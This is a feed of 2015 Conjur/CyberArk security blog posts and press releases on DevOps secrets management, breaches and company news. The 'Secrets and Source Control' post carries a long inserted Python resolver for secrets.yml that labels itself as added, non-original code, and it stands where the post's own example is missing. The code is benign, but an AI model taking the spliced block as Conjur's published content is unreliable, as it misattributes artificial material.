The trope, regarding east coast “rounds and valuations” and west coast “rounds and valuations”, causes great early stage companies to seek alternatives. Enterprises in the Boston area need to do more to become design partners with security startups, particularly since there are cyber security domain expert talent pools in the startup community.

Interested in attending the Conference? Good news, tickets are still available. Register Now! Don’t forget to check out the entire conference agenda to see what other great speakers will be participating!


]]>
Conjur Welcomes New Chief Operating Officer https://www.cyberark.com/blog/conjur-welcomes-new-chief-operating-officer/ Tue, 22 Sep 2015 13:26:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-welcomes-new-chief-operating-officer/  

Press Release:

Serial Entrepreneur Mark Saccone Brings 30 Years of Cross-Functional Expertise in Sales, Marketing, Finance, Operations, Engineering, and Technology to Conjur COO Role

WALTHAM, Mass. – Sept. 22, 2015 – Conjur, Inc., the leading provider of security orchestration software, has named Mark Saccone as the company’s new Chief Operating Officer (COO). Most recently, Mark was COO of 360BrandVision, a 3-D holographic delivery platform company. Mark has 30 years of experience building high growth organizations with a cross-functional background in senior finance, strategic planning, sales and marketing, operations, engineering, and management.

“Mark is a seasoned leader whose decades of prior experience and success will help to accelerate Conjur’s growth,” said Elizabeth Lawler, CEO at Conjur. “As we work closely together to shape Conjur’s operational strategy, I am confident that, with Mark’s steady guidance, we will optimize Conjur’s operations practices to assure market leadership for the company’s transformational security and compliance technology.”

Mark previously founded two startups, TalMark Nutrition and Emplanet, and has been the second employee at two other companies. He was VP of Finance at DocBox, Inc. and COO at Optimatum Group. He was also Director, Product Management & Development, Strategic Marketing at Fidelity Investments. Mark earned a master’s degree in business administration from Duke University’s Fuqua School of Business and a bachelor’s degree in industrial engineering and operations research from the University of Massachusetts – Amherst.

“I joined Conjur because I see incredible potential to build a new platform for a market opportunity still in its infancy, but growing exponentially,” said Mark Saccone. “The co-founders have an incredible vision and have done a great job creating a product that solves security and compliance vulnerabilities found in a variety of vertical sectors, such as finance, health care, retail and government. My focus is to rapidly scale the organization while delivering more capabilities and satisfied customers.”

About Conjur, Inc.

Conjur provides security orchestration software to manage, enforce and audit infrastructure applications with modern IT systems including Chef, Docker, Jenkins, Amazon Web Services, Open Stack, Cloud Foundry, Microsoft Azure and Puppet Labs. The company provides best practice reference architectures and standards based open source tools so that security best practices can become part of every software development activity and IT environment. Customers include Netflix, Genome Bridge, OpenDNS and Rally Software, among others. Founded in 2012, Conjur is based in Waltham, Massachusetts. Investors include Avalon Partners, Amplify Partners and Andy Palmer (Founder of Koa Labs). Visit: www.conjur.net and follow on Twitter @conjurinc.

PR Contact:
Tracy Wemett
BroadPR
+1-617-868-5031

Conjur Participates at DevOpsDays Boston 2015 https://www.cyberark.com/blog/conjur-participates-at-devopsdays-boston-2015/ Tue, 15 Sep 2015 12:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-participates-at-devopsdays-boston-2015/  

Press Release:

Conjur Discusses Security Orchestration Solutions at DevOpsDays Boston – September 15-16, 2015 – Cambridge, Massachusetts

WALTHAM, Mass., Sept. 15, 2015 – Conjur, Inc., provider of security orchestration software, is a Gold Sponsor of DevOpsDays Boston, taking place on Tuesday, September 15 – Wednesday, September 16, 2015 in Cambridge, Massachusetts. DevOpsDays events are organized locally worldwide and bring operations and development teams together to collaborate. Dustin Collins, Developer Advocate at Conjur, has been the organizer of many past DevOps related Boston events.

WHAT: Conjur at DevOpsDays Boston 2015

WHEN: Tuesday, September 15 – Wednesday, September 16, 2015

WHERE: Microsoft NERD Center, 1 Memorial Drive #1, Cambridge, Massachusetts

Continuous software delivery and automated deployment pipelines (DevOps) deliver tremendous value to companies across various industries. As more applications and workloads are incorporated into these practices, security and compliance remain top of mind. Conjur’s security orchestration software is an integral piece of the technical toolchain, and Conjur’s infrastructure and software management approaches are something that IT executives need in order to establish a clear Agile, DevOps Blueprint. Conjur helps with privileged user IDs and credentials, as well as maintaining separation of duties. The company also enables secure access to on-demand services and infrastructure, compliance and governance maintained by test and release automation, as well as traffic and service authorization.

Stop by the Conjur table to learn more. Technical team members will be in attendance and attendees will be able to sign up for a live demo or self-paced, interactive tutorials. There is a raffle for a gift card for an Odyssey cruise for the winner and five team members as well as a Rubik’s cube challenge. Anyone who completes the puzzle in under two minutes wins a $25 American Express gift card.

DevOpsDays Boston is currently sold out. For more information or to join the waitlist, visit: http://www.devopsdays.org/events/2015-boston/.

Conjur provides a cloud-native platform for directory services, authorization, audit and compliance so that security best practices can become part of the fabric of every software development activity and IT environment. For more information, visit: https://www.conjur.net/products.

About Conjur, Inc.

Conjur provides security orchestration software to manage, enforce and audit infrastructure applications with modern IT systems including Chef, Docker, Jenkins, Amazon Web Services, Open Stack, Cloud Foundry, Microsoft Azure and Puppet Labs. The company provides best practice reference architectures and standards based Open Source tools so that security best practices can become part of every software development activity and IT environment. Clients include Netflix, The Broad Institute, OpenDNS and Rally Software, among others. Founded in 2012, Conjur is based in Waltham, Massachusetts. Investors include Avalon Partners, Amplify Partners and Andy Palmer (Founder of Koa Labs). Visit: www.conjur.net and follow @conjurinc.

PR Contact:
Tracy Wemett
BroadPR
+1-617-868-5031

Flirting With Security https://www.cyberark.com/blog/flirting-with-security/ Thu, 10 Sep 2015 13:30:00 +0000 https://cyberarkvx2.wpengine.com/blog/flirting-with-security/  

The Ashley Madison Hack has been all over the news in recent weeks, and why wouldn’t it be? It has all of the drama and shock factor we crave, standing out in a sea of run-of-the-mill hack and breach stories because it deals with marriage and infidelity. What is surprising is that our attention is so focused on who is cheating on their spouse that we are missing the bigger picture. Whether the story is about medical records, vehicles, social security numbers or infidelity exposed, the common theme is that businesses are not keeping our information safe; they are not doing enough to make sure our identity is protected.

What is even more shocking is that despite every story of a leaked photo or a stolen credit card, we continue to put our faith in these businesses without demanding protection. Having our information in digital records is often a necessity for conducting business, and therefore protecting this personal information must be the company’s top priority. All of these breaches show us one thing: protecting our data isn’t a priority. We need to start reading past the sensationalized text and focus on the real problem, our security.

Here are some different takes on the Ashley Madison hack:

Ashley Madison Chief Executive Noel Biderman was let go in the wake of the Ashley Madison breach. Biderman, who had previously stated that affairs could be good for society as long as they were kept secret, seemed unable to defend his own principle once the personal information of millions of users was exposed.

This piece by Arik Hesseldahl points out that although other companies are able to survive after highly-publicized breaches, it will be tough for Ashley Madison to recover. He also points out that companies should have learned by now that information must be encrypted.

Business Standard reports that the Ashley Madison breach has given spammers a great opportunity to take advantage of those affected. There has been a recent surge in spam emails with domains relating to Ashley Madison. Some victims of the breach have been blackmailed due to the highly embarrassing and personal nature of the leaked information.

This article from Forbes discusses a burning question on everyone’s mind: why hasn’t the FTC made a statement about Ashley Madison or Avid Life Media and whether it will be conducting an investigation. The piece discusses many reasons why the FTC has remained silent up to this point, a main reason being that the FTC could be conducting a pre-investigation which does not require a public announcement.

John McAfee presents an entirely new spin on the story. He argues that Ashley Madison was not hacked by a group of men; rather, the information was stolen and leaked by one woman who had worked for Avid in the past. He supports this claim through various points, including that the person had a very intimate understanding of the company’s technology stack and that the language in the manifesto seemed to come from a woman, the writer referring to men as “scumbags”.

And one last one, just for laughs…

From High Powered Rifles to Robot Spiders…Privilege Really Is Everywhere https://www.cyberark.com/blog/from-high-powered-rifles-to-robot-spidersprivilege-really-is-everywhere/ Wed, 09 Sep 2015 17:43:15 +0000 https://www.cyberark.com/blog//

Recent events like Passwords15, Black Hat USA and DEF CON have raised visibility about the evolving cyber security threat landscape – focusing on high profile hacks, new regulations and innovative approaches for protecting organizations’ most precious assets.

Sessions and demonstrations focusing on topics like defeating pass-the-hash attacks, managing active directory backdoor risks, and taking control of everything from a car to a power plant highlight vulnerabilities that exist in nearly everything we interact with.

Several of these sessions, including our own that examined Kerberos attack trends, incorporated a privileged account security connection. One of the more surprising connections was the hack of the TrackingPoint sniper rifle scope. Wired covered the hack in detail, but sitting in the audience hearing about how persistent the research duo was in finding different avenues for breaking into (hint: it got destructive) and gaining control over the WiFi-enabled scope was impactful.

Understanding the sheer determination of attackers – whether motivated by simple curiosity or malicious intent – has valuable lessons for any organization: attackers will get in; it’s just a matter of when and how.

In this case, the researchers took advantage of multiple vulnerabilities including the rifle scope’s default passwords and used SSH keys to gain root access and make changes to the Linux-based system – altering factors such as ballistics values and temporarily locking the trigger. One of the overall messages was that vendors and development teams often ignore “low hanging fruit”– like better managing passwords in embedded devices. In the new world order of interconnected devices, security must be built in.

One of the lighter moments of the talk came when sharing a note to customers from the gun manufacturer’s website in response to the well-publicized hack: “… Please note the following: Since your gun does not have the ability to connect to the internet, the gun can only be compromised if the hacker is actually physically with you. You can continue to use WiFi (to download photos or connect to ShotView) if you are confident no hackers are within 100 feet.”

Shifting gears slightly to the Intel Developer Forum, security was center stage when GM of Intel Security Group, Chris Young, addressed security through the perspectives of consumer and enterprise users. The messages were consistent: security must be baked into everything – every application, every device, every system. Most importantly, it must complement the user experience, not impede it.

Intel CISO Brent Conran spoke about the complexity of his own IT environment and the company’s partnership with CyberArk to go beyond perimeter defenses to protect privileged accounts – which are often sought by attackers as a powerful pathway to accessing sensitive data. A Data Center Knowledge article highlights CyberArk CEO Udi Mokady joining Conran on stage to talk about the real and increasingly dangerous cyber threats posed by a lack of control over privileged accounts and credentials – including those used to enable applications to communicate with other enterprise applications or databases.

The Intel security session concluded with the on-stage hack of a spider-looking robot (technically a hexapod), which was protecting an enormous donut. While far less threatening than the rifle example, in the on-stage demonstration, “Hacker Jenny” was able to get root access to the software controlling the robot via the cloud, and simply put it to sleep, presumably so she could steal the delicious donut.

So whether it’s a rifle, a robot or a car – privilege really is everywhere. In the end, it doesn’t matter if the attackers are 100 feet or 2,000 miles away. Privileged accounts are just too tempting for a persistent attacker to resist.

All Of Your Robots Belong To Us https://www.cyberark.com/blog/all-of-your-robots-belong-to-us/ Tue, 08 Sep 2015 14:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/all-of-your-robots-belong-to-us/  

[Note: Conjur’s first blog post out of stealth in December of 2013 was entitled “Take command of your robot army”. The robot army is still out there, and growing! This post revisits some of the same concepts through the lens of 2015 IT Operations.]

In the above context, “Us” used to refer to Developers, Operations, and End Users. With the advances in Cloud, Big Data, Containerization, MicroServices, IoT, etc., “Us” now extends to mobile devices (Smart Phones, Tablets, Wearables), Ephemeral Machine Instances (VMs and Containers), Beacons/Sensors, automated infrastructure workflows and build and deploy pipelines. In other words, robots (aka “code”) are running the show.

Traditional perimeter-based approaches to System and Data Security are no longer viable or effective in today’s Cloud-native and Software-Defined world. Companies need to start thinking strategically about how they manage and govern access by developers, infrastructure users, machines and service identities in order to ensure that security is implemented consistently throughout the new IT stack.

In Verizon’s 2015 Data Breach report, 3 of the top 4 causes of breach were due to stolen credentials of internal users or system-level accounts. The latter, which tend to be the command center for robot armies, are typically the most disruptive and costly.

The starting place for securing the increasingly diverse army of “robots” has been to implement point solutions over existing technologies. This leads to having common security controls spread across many technologies: passwords are stored in files, HSMs and config repositories; /etc/sudoers files are stored in configuration management and Cloud IaaS IAM systems; traffic authentication rules are stored in source code repositories. Security sprawl and security breakdown.

In previous eras, when the topology of IT systems was more homogeneous, managing merely one of the axes of access control – “Identity” – was reasonably straightforward. The system of record was a singular directory of users stored in either Active Directory or LDAP. With the onset of Cloud Computing, Virtualization, and now Containerization plus Microservice Architectures, the notional responsibilities associated with “Identity” have been extended to machines, instances and microservices, all of which can be ephemeral. This new set of users is what we describe as your “Robot Army”. The result is a very complex Identity and Access Management challenge that requires a completely new approach.

Securing Your Robot Army From Breaches

Your robots will be smart, as they typically have full and direct access to more data and information than standard users do. As a result, they are an attractive attack vector and, if compromised, they will give the hacker full access to whatever their code contains. Once the hacker has control over a robot, they can perform malicious activities such as escalating privileges to access and steal sensitive data or delete important systems or data. Managing your robot army should be approached the same way you manage and administer the roles and access rights of your normal users. Security practices like least privilege and role-based access control should be implemented, along with an immutable audit log of all activity, to help mitigate either malicious or unintentional access to critical systems and data.

How Large Is Your Robot Army?

The answer to that question depends upon where your organization is with respect to Cloud infrastructure and other “new stack” technology like microservices. Are you using Public Cloud Infrastructure such as Amazon Web Services or Microsoft Azure? Perhaps you also have a Private Cloud and other on-premises systems. Have you implemented a containerization strategy? Have you deployed a Continuous Integration and Delivery system? Most likely your answers are all yes, or partially yes along with plans to deploy new technology in the upcoming months. Your Robot Army is probably already larger than you initially believed, and growing each day.

Securing Your Robot Army

At the core, a new platform is required to identify, manage, control and audit all these new system actors. One that has been purpose-built with API controls for Authentication and Authorization. Manual or one-off processes don’t allow you to move at the speed of DevOps and Cloud, and are oftentimes fraught with human error.

The platform should also include a comprehensive Audit log for Security and Compliance, and communication with internal and external teams. Microservices should also be part of your Authorization strategy. APIs shouldn’t be completely open, and service-level authorization adds another layer of security, complete with an audit log for compliance and review.

With a solution like this deployed, you can be assured that your Robot Army remains under your full control and that evil Robots won’t be taking over your Infrastructure.

Secrets and Source Control: A Maturity Model https://www.cyberark.com/blog/secrets-and-source-control-a-maturity-model/ Fri, 04 Sep 2015 20:20:00 +0000 https://cyberarkvx2.wpengine.com/blog/secrets-and-source-control-a-maturity-model/  

Today I want to talk about secrets and source control. Earlier this week, Carlo from humankode posted an article about how a bug in Visual Studio 2015 exposed his source code on GitHub and cost him $6,500 in a few hours. In short, there is a bug in VS2015 that publishes your source code to a public repo even though you explicitly say you want the repo to be private. His AWS keys were in the repo, a bot scanned them and launched a bunch of instances. That post has received a lot of attention, and it should. We should have full control over the visibility of the software we write, for a variety of reasons. However, public or private, if we check our credentials into source control we bear some responsibility for their misuse. In this post, I’ll cover three different ways to handle secrets in source control, framed in a maturity model.

From least to most refined, this is the maturity model for secrets in source control:

  1. Checked directly into source control.
  2. Tracked outside source control.
  3. Referenced by source control.

Let’s cover them one-by-one.

Checked directly into source control

Most agree that this is a bad idea, for several reasons. I’m going to focus on the friction it causes in collaborative environments.

  • Visibility into who/what has access to credentials is difficult. If you want to manage access to those credentials, you have to start locking down source control. And your CI system. And your Chef server. The list goes on. Now these tools that are meant for collaboration have a mess of rules to navigate. This limits their effectiveness and introduces bottlenecks (“file a ticket for access to that Jenkins job”).
  • Credential rotations are now tied to application/infrastructure deploys. Tying deploys to rotations has the effect of slowing everything down and introducing interesting chicken-and-egg “opportunities”. Let’s face it: many of us have not achieved continuous delivery yet. Here’s what happens. An engineer has pushed a feature to a cookbook, but is still working on the tests, to be committed soon. We need to rotate a database password. So, do we push the code without tests or roll back the change for now to get the rotation deployed? Neither option is desirable.
  • Encrypting credentials and checking them in is not a solution. It creates another problem, maintaining and distributing decryption keys. These keys are just new secrets.

Tracked outside source control

We have removed all secrets from our code and manage them in a system outside source control. This is a step in the right direction, but it only solves some of our problems and adds new ones to the mix.

  • One of the learnings from the annual State of DevOps reports is that in order to be a high-performing IT organization, you need to be able to recreate your production environments entirely from source control. Credentials are a part of your production environment, but now they have been removed from source.
  • Auditing becomes more difficult. We’ve now lost a key benefit of having your secrets in source: a history of who changed what, when. If someone rotates an API token or accesses a SSL cert, we should know when it happened and who did it. A security framework that doesn’t include an immutable audit log is not yet mature.
  • We’ve placed an extra burden on developers. Without proper tooling, devs are now responsible for maintaining the credentials they need to develop features. This usually means that credentials are written in plain text into environment variables or into local files kept out of the repository via .gitignore. Rotations require extra communication. Getting access to new credentials is often not straightforward. If security is standing in the way of someone delivering value to your organization, they will work around it.

Referenced by source control

Credentials are dependencies of the code we write. If we fail to install the Postgres library or make the Postgres password available to our application, the end result is the same: our application does not run. Library dependencies are easy, we can list them directly in source. We should treat secrets the same way, but instead of storing their values we store where they can be retrieved from. To enable this pattern, we need a format to define credential references and tooling to support retrieval.

Earlier this summer, we (the devteam at Conjur) released a format and tooling to enable exactly this workflow. They are both open-source and you can use them whether or not you are a Conjur customer. We wrote them because existing OSS solutions didn’t meet our needs, namely: works with everything we use and is easy to deploy (we wrote this tooling in Go for easy distribution).

secrets.yml is a format that maps environment variables to where credentials are stored. An example:

summon is a command-line tool that will resolve the references in secrets.yml and inject them as environment variables into any child process. When the process exits, the secrets are not left on the system. You only need to prefix your command with ‘summon’:

  • summon chef-client --once
  • summon bundle exec rackup
  • summon aws s3 cp ...

Summon works with any tooling you already use that accepts environment variables (Chef, Puppet, Docker, any programming language, etc.). It is also not Conjur-specific; we wrote it to work with pluggable providers (systems that hold your secrets). We’ve written AWS S3, OS X keychain and Conjur providers so far, but we’d love to see more providers from the community. Take a look and tell us what you think.
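The secrets.yml reference format and the summon injection flow described above, as an added example that is not Conjur's or summon's code: a minimal resolver that parses a constructed secrets.yml, resolves `!var` and `!var:file` references through a pluggable provider (here an in-memory dict standing in for the S3, keychain or Conjur providers), passes the results to a child process's environment only, and deletes any temp files when the child exits. The tag syntax is modeled on summon's; the parser, the `lookup` provider and `FAKE_STORE` are assumptions of this example.

```python
import os
import subprocess
import sys
import tempfile

PYTHON = sys.executable  # interpreter used for the demo child process

# Constructed secrets.yml text (not from the original post). Tagged values are
# references into a store; the repository never holds the credential itself.
SECRETS_YML = """\
# database credential, injected as a plain environment variable
DB_PASSWORD: !var postgres/prod/password
# private key: written to a temp file, the env var carries the file path
SSL_KEY: !var:file ssl/private_key
# untagged values are literals
APP_ENV: production
"""

# Constructed in-memory store standing in for a pluggable provider
# (the post mentions AWS S3, OS X keychain and Conjur providers).
FAKE_STORE = {
    "postgres/prod/password": "example-pw-rotated-2015-09",
    "ssl/private_key": "-----BEGIN PRIVATE KEY-----\nEXAMPLE\n-----END PRIVATE KEY-----\n",
}


def lookup(path):
    """Provider callback (hypothetical): fail loudly on an unknown reference so
    a typo in secrets.yml stops the run before the child process starts."""
    if path not in FAKE_STORE:
        raise KeyError(f"secret reference not found: {path}")
    return FAKE_STORE[path]


def parse_secrets_yml(text):
    """Return (env_name, kind, value) triples from a minimal secrets.yml.
    kind is 'var', 'file' or 'literal'. Hypothetical parser, not summon's."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if ":" not in line:
            raise ValueError(f"line {lineno}: expected NAME: value")
        name, _, rest = line.partition(":")
        name, rest = name.strip(), rest.strip()
        if rest.startswith("!var:file "):
            entries.append((name, "file", rest[len("!var:file "):].strip()))
        elif rest.startswith("!var "):
            entries.append((name, "var", rest[len("!var "):].strip()))
        elif rest.startswith("!"):
            raise ValueError(f"line {lineno}: unsupported tag in {rest!r}")
        else:
            entries.append((name, "literal", rest))
    return entries


def resolve(entries, provider=lookup):
    """Resolve every reference up front. Returns the env additions and the
    temp files that must be deleted once the child process exits."""
    env, temp_files = {}, []
    for name, kind, value in entries:
        if kind == "literal":
            env[name] = value
        elif kind == "var":
            env[name] = provider(value)
        else:  # 'file': mkstemp creates the file readable only by this user
            fd, path = tempfile.mkstemp(prefix="summon-")
            with os.fdopen(fd, "w") as fh:
                fh.write(provider(value))
            env[name] = path
            temp_files.append(path)
    return env, temp_files


def cleanup(temp_files):
    """Remove the temp files so no secret material stays on disk."""
    for path in temp_files:
        try:
            os.remove(path)
        except FileNotFoundError:
            pass


def run_with_secrets(text, argv, provider=lookup):
    """Run argv with the resolved secrets in *its* environment only. The parent
    process environment is never modified and temp files are removed afterwards."""
    env, temp_files = resolve(parse_secrets_yml(text), provider)
    try:
        proc = subprocess.run(argv, env={**os.environ, **env},
                              capture_output=True, text=True)
        return proc.returncode, proc.stdout
    finally:
        cleanup(temp_files)


if __name__ == "__main__":
    child = ("import os; print(os.environ['DB_PASSWORD']); "
             "print(open(os.environ['SSL_KEY']).read().splitlines()[0])")
    code, out = run_with_secrets(SECRETS_YML, [PYTHON, "-c", child])
    print(out, end="")
    print("parent env untouched:", "DB_PASSWORD" not in os.environ)
```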


In conclusion, managing secrets for complex infrastructure and distributed applications is hard. We as engineers bear the responsibility of coming up with a solution that works for our organizations. Checking secrets into source control sets you up for future headaches, even if the repository is private. Removing secrets from source control creates new problems to solve. Together, we can work on better security tooling that reinforces collaboration and doesn’t significantly impact our velocity.

DevOps and Security: The Five Monkeys https://www.cyberark.com/blog/devops-and-security-the-five-monkeys/ Mon, 31 Aug 2015 20:33:00 +0000 https://cyberarkvx2.wpengine.com/blog/devops-and-security-the-five-monkeys/  

August has been a busy month for me as the developer advocate at Conjur. I gave a talk at DevOpsDays Pittsburgh, organized the monthly Boston DevOps meetup and just got back from DevOpsDays Chicago. I have the opportunity to talk to a lot of people and learn about how they align DevOps and security. It’s a hard problem. Today I’d like to share with you a story about monkeys. It’s relevant, I promise. Read on.

The Five Monkeys story is a popular tale of a scientific experiment performed in the late 1960s. It goes like this:
A group of scientists placed five monkeys in a cage, and in the middle, a ladder with bananas on top.

Every time a monkey went up the ladder, the scientists soaked the rest of the monkeys with cold water.

After a while, every time a monkey would start up the ladder, the others would pull it down and beat it up.

After a time, no monkey would dare try climbing the ladder, no matter how great the temptation.

The scientists then decided to replace one of the monkeys. The first thing this new monkey did was start to climb the ladder. Immediately, the others pulled him down and beat him up.

After several beatings, the new monkey learned never to go up the ladder, even though there was no evident reason not to, aside from the beatings.

The second monkey was substituted and the same occurred. The first monkey participated in the beating of the second monkey. A third monkey was changed and the same was repeated. The fourth monkey was changed, resulting in the same, before the fifth was finally replaced as well.

What was left was a group of five monkeys that – without ever having received a cold shower – continued to beat up any monkey who attempted to climb the ladder.

Grace Hopper best sums up the outcome of the experiment in this quote:
The most damaging phrase in the language is: “It’s always been done that way.”
Here’s the funny thing about the experiment: it’s not true. Someone at some point took the research of G.R. Stephenson and added in the ladder and bananas to prove their point. But, does it matter if it’s true? No. The way this story has spread only proves its point: we tend to accept what people say at face value and don’t bother with due diligence. There are blog posts and conference talks about The Five Monkeys; it’s part of the conversation now. It has given itself meta-relevance.
What does this have to do with DevOps and security? It’s relevant because there are a lot of assumptions on either side of the DevOps + security conversation. Assumptions like “We have to do this to remain compliant” or “There is no way we can audit our chatbot the way you want”. Often these assumptions are baseless – we follow them because no one wants to be the one to ask “Why?”.
  • “We’ve always done it this way”. “Why?”.
  • “We can’t do that, it’ll slow us down”. “Why?”.
  • “This checklist item is non-negotiable”. “Why?”.

“Why?” is not an accusation or a challenge. To solve the difficult problems we as an industry face integrating security into DevOps, there is no room for ego on either side. The people I’ve talked to that have had the most success aligning their DevOps initiatives with security needs encourage each other to ask “Why?”. Keep in mind that this is not a one-way conversation. Some security requirements don’t make sense any more with modern workflows and infrastructure. Adopting DevOps does not mean you should throw caution to the wind. Let’s all work together and ask “Why?” more often.

Conjur Answers Call for Jenkins Security with New Architecture https://www.cyberark.com/blog/conjur-answers-call-for-jenkins-security-with-new-architecture/ Tue, 25 Aug 2015 11:55:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-answers-call-for-jenkins-security-with-new-architecture/  

Press Release  

New Conjur Deployment Server Reference Architecture Secures Releases of Artifacts and Enables Auditability

WALTHAM, Mass., Aug. 25, 2015 – Conjur, Inc., the leading provider of security orchestration software, released a new Deployment Server Reference Architecture that secures Jenkins, the popular build and continuous integration tool. The new architecture separates the build and release machines, enforces the security of each new release of code and makes the entire process auditable.

“Jenkins provides collaborative and transparent continuous delivery but it can be difficult to control access and manage secrets required for production deployments,” said Chris Farnham, Director, Engineering at Kyruus, Inc., a leading provider of patient access and referral management solutions. “Conjur manages secrets and provides powerful privilege access capabilities that improve Jenkins’ security and compliance.”

Traditionally, DevOps teams address security and auditability concerns by running multiple Jenkins masters, adding Jenkins plugins and creating a dedicated “Jenkins” Management team. Conjur’s new Deployment Server Reference Architecture splits continuous integration and deployment. The Reference Architecture keeps the release machine and the build machine separate, so that a Jenkins job cannot publish the artifact itself. Instead, the Jenkins job has to interact with a separate release server, which will have the right credentials to publish to various destinations (e.g., RubyGems.org, Heroku, Docker Hub, etc.), but does not have the ability to build artifacts or modify them in any way.

“Jenkins powers your continuous integration through collaboration and visibility,” said Mitch Haile, Vice President of Products at Conjur. “However, Jenkins doesn’t provide access controls for deploying artifacts into production. Conjur eliminates the need to maintain secrets manually while providing powerful privilege access capabilities that enable Jenkins security and compliance. By adopting the Conjur Reference Architecture, enterprises eliminate the bottleneck in their deployment pipeline, while securing the entire system, and ultimately become more responsive to the needs of the business.”

The benefits of adopting the new architecture include:

  • Secure Login: Both Web and SSH login are powered by Conjur via the industry standard PAM system
  • Secure Secrets: Secrets that are used by Jenkins jobs are secure, organized and kept off the hard drive at all times
  • Production-Ready Artifacts: Artifacts produced by Jenkins are highly verified and trustworthy

The new architecture is available immediately at: http://info.conjur.net/live-demo-conjur.

For the blog “Why Continuous Integration and Continuous Delivery Are Not the Same,” visit: http://blog.conjur.net/why-continuous-integration-and-continuous-delivery-are-not-the-same.

For more information on Conjur and Jenkins, visit: http://www.conjur.net/solutions/jenkins.

About Conjur, Inc.

Conjur provides security orchestration software to manage, enforce and audit infrastructure applications with modern IT systems including Chef, Docker, Jenkins, Amazon Web Services, Open Stack, Cloud Foundry, Microsoft Azure and Puppet Labs. The company provides best practice reference architectures and standards based Open Source tools so that security best practices can become part of every software development activity and IT environment. Clients include Netflix, Genome Bridge, OpenDNS and Rally Software, among others. Founded in 2012, Conjur is based in Waltham, Massachusetts. Investors include Avalon Partners, Amplify Partners and Andy Palmer (Founder of Koa Labs). Visit: www.conjur.net and follow @conjurinc.

Conjur Names New Vice President, Products https://www.cyberark.com/blog/conjur-names-new-vice-president-products/ Wed, 19 Aug 2015 11:55:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-names-new-vice-president-products/  

Press Release:

Startup Veteran Mitch Haile Brings More Than 15 Years of Software Design, Product Management and Executive Experience to Conjur to Lead Product Direction

WALTHAM, Mass., Aug. 19, 2015 – Conjur, Inc., provider of security orchestration software, has named Mitch Haile its new Vice President, Products. Previously, Mitch was a consulting vice president at Cobalt Iron, an enterprise cloud backup company, where he led the development of the company’s proprietary software products and patent portfolio. He is responsible for managing Conjur’s product roadmap and product marketing.

“Companies developing and deploying at Web-scale know that they need to move fast, adopt the DevOps culture and move to continuous integration and delivery to remain competitive,” said Elizabeth Lawler, CEO at Conjur. “The challenge to this approach is being able to properly secure across a variety of point solutions and DevOps tools, creating gaps that leave organizations vulnerable with respect to security, including audit and compliance. With Mitch leading our product team at Conjur, he will help us to continue to grow and firmly establish Conjur as a foundational technology for current and future generations of IT systems.”

Before Cobalt Iron, Mitch was CTO and VP, Engineering at Connected Data, a company that makes storage file sharing hardware and software for business users. He was CTO and Co-Founder of Pancetera Software Inc., which built virtual machine data protection products for VMware environments, acquired by Quantum (NYSE:QTM) in 2011. Mitch was among the first ten engineers hired at Data Domain (IPO 2007, sold to EMC in 2009), where he built and led the System Management group for four years. He is a named inventor on over two dozen patents pending and granted. Mitch earned a degree in computer science from The College of Wooster where he was an Arthur Holly Compton scholar.

“I am thrilled to work with the outstanding team at Conjur to drive the product roadmap and contribute to its already impressive growth,” said Mitch Haile. “The DevOps security market is growing at an enormous rate and I look forward to being able to help enterprises with their security orchestration and compliance needs.”

About Conjur, Inc.

Conjur provides security orchestration software to manage, enforce and audit infrastructure applications with modern IT systems including Chef, Docker, Jenkins, Amazon Web Services, Open Stack, Cloud Foundry, Microsoft Azure and Puppet Labs. The company provides best practice reference architectures and standards based Open Source tools so that security best practices can become part of every software development activity and IT environment. Clients include Netflix, Genome Bridge, OpenDNS and Rally Software, among others. Founded in 2012, Conjur is based in Waltham, Massachusetts. Investors include Avalon Partners, Amplify Partners and Andy Palmer (Founder of Koa Labs). Visit: www.conjur.net and follow @conjurinc.

PR Contact:
Tracy Wemett
BroadPR
+1-617-868-5031


DevOpsDays Pittsburgh Here We Come! https://www.cyberark.com/blog/devopsdays-pittsburgh-here-we-come/ Thu, 13 Aug 2015 11:24:00 +0000 https://cyberarkvx2.wpengine.com/blog/devopsdays-pittsburgh-here-we-come/  

Developer Advocate from Conjur Speaking on Security at DevOpsDays Pittsburgh

Conjur’s Dustin Collins is Presenting, “Security for Humans” at DevOpsDays Pittsburgh –

August 13-14, 2015 – Pittsburgh, Pennsylvania

WALTHAM, Mass., Aug. 13, 2015 – Dustin Collins, Developer Advocate at Conjur, Inc., provider of security orchestration software, is presenting “Security for Humans” at DevOpsDays Pittsburgh, Thursday, August 13 – Friday, August 14, 2015 in Pittsburgh, Pennsylvania. DevOpsDays events are organized locally worldwide and bring operations and development teams together to collaborate.

WHAT:        “Security for Humans,” Presented by Conjur’s Dustin Collins at DevOpsDays Pittsburgh

WHEN:        Thursday, August 13, 2015, 11:00 a.m. – 11:20 a.m. EDT

WHERE:       William Pitt Union, University of Pittsburgh, 3959 Fifth Avenue, Pittsburgh, Pennsylvania

There are many stakeholders involved when creating or assembling a security toolchain. How do you satisfy the different, and sometimes conflicting, needs of these stakeholders in a responsive way? We can use some of the concepts developed in the user experience domain to create better security tooling. User personas allow us to map out the different roles that must interact with security to get their work done. These personas are living documents and provide a fast feedback loop when paired with user interviews. Dustin Collins argues that providing direction while allowing freedom is a key tenet of integrating security into the different parts of an organization.

Dustin is a polyglot engineer and Conjur’s developer advocate. As the organizer for the Boston DevOps meetup, he is most interested in how, as a community, we can iterate on the processes and tools to enable continuous delivery of quality software. Previously, he was Principal Software Engineer at Essess, Inc. He was Senior Software Engineer at Carbonite, Python Web Developer at both 5Q Communications and LUZEO GmbH, and Web Developer at University of Northern Iowa, among other positions. Follow Dustin on Twitter @dustinmm80.

For more information or to register for the event, visit: http://www.devopsdays.org/events/2015-pittsburgh/.

About Conjur, Inc.

Conjur provides security orchestration software to manage, enforce and audit infrastructure applications with modern IT systems including Chef, Docker, Jenkins, Amazon Web Services, Open Stack, Cloud Foundry, Microsoft Azure and Puppet Labs. The company provides best practice reference architectures and standards based Open Source tools so that security best practices can become part of every software development activity and IT environment. Clients include Netflix, Genome Bridge, OpenDNS and Rally Software, among others. Founded in 2012, Conjur is based in Waltham, Massachusetts. Investors include Avalon Partners, Amplify Partners and Andy Palmer (Founder of Koa Labs). Visit: www.conjur.net and follow @conjurinc.
